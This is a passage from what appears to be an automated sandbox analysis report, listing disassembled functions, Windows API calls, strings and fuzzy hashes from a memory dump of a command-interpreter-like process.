                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53C01230B08B46C7FB2C7B312CB143A99A57F48211F846838CA0B8A2D2DF2CD8098620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC5508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: DefaultUser
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3358694519-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 151a5ca9c137e4378c24921fa030fea3973e8292ba5ed08075eb233a0293c3ab
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11E0C2A2D083538AF5543A416C613B69953EF687A2FC44031CA0D023C94B2D38635628
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC2E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a44a212e40b99fc4bd1c6820c83908a7b8771fe08deee0c51afb434b1223b4ee
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F0E921B0978544EB40975BBD5016A9291AF48BF0F888330EF7C47BC5DF3CD4528300

                                                                                                                                                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB5B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1388555566-2647954630
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 129efa7cd8951b10abab12247f66d2861c40d8deca6ce39a5548d4a89c6e6dc2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38A29435A08B8286EB10AB25AC241BBFBA1FF89794F849135DA4E477D5DF3CE445C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBE680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 511550188-726566285
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f58209d52997ce118e84973252f1af6eaa64d5988339cbcdcec24613355639fa
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9452A331A0C79286EB24AB15AC242BBEAE1FF45B94FD45235D94E43794DF3CE8458B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB9E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 812COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmp$wcschr$wcstol
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1738779099-3004636944
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: df2309bff9f12ed830951dfc958020a59d7a9abd219feed217ef639333d68c55
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1728F32B087528AEB20AF699C642BFB7A1FF54748F819235CE4D57794DF3CA8158360
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED7F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED7F44
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706ED7F5C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED7F9E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED7FFF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8020
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8036
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8061
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706ED8075
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED80D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706ED80EA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED8177
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED819A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED81BD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED81DC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED81FB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED821A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF706ED8239
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8291
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED82D7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED82FB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED831A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8364
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706ED8378
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED839A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED83AE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED83E6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8403
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF706ED8418
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3637805771-3100821235
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a79151f21cbb2f5de0ef962a0dff172dd51a2f8a2461997091fc7497a27c9542
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6E18335A08B52CAE710AF65EC2417BF6A1FF49B98B849235CE1E53794DF3CA449C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB3F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s$%s
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3623545644-3518022669
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd1d635d304d9b8fc47bbf17458a3d922035ebb172f74a43403d1b86dd740a60
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02D2A232A087828AEB64AF259C602BBB7A1FF44758F945135DB0E47AD9DF3CE544C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB2C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %9d$%s
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4286035211-3662383364
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 598ba86598e47181d3827c03e7975ff333ef8375984d9101bf580af6950dfbe2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A52A336A08B828AEB64AF24EC602FBB7A1FF85798F845135DA0E47794DF3CD5458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC18D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
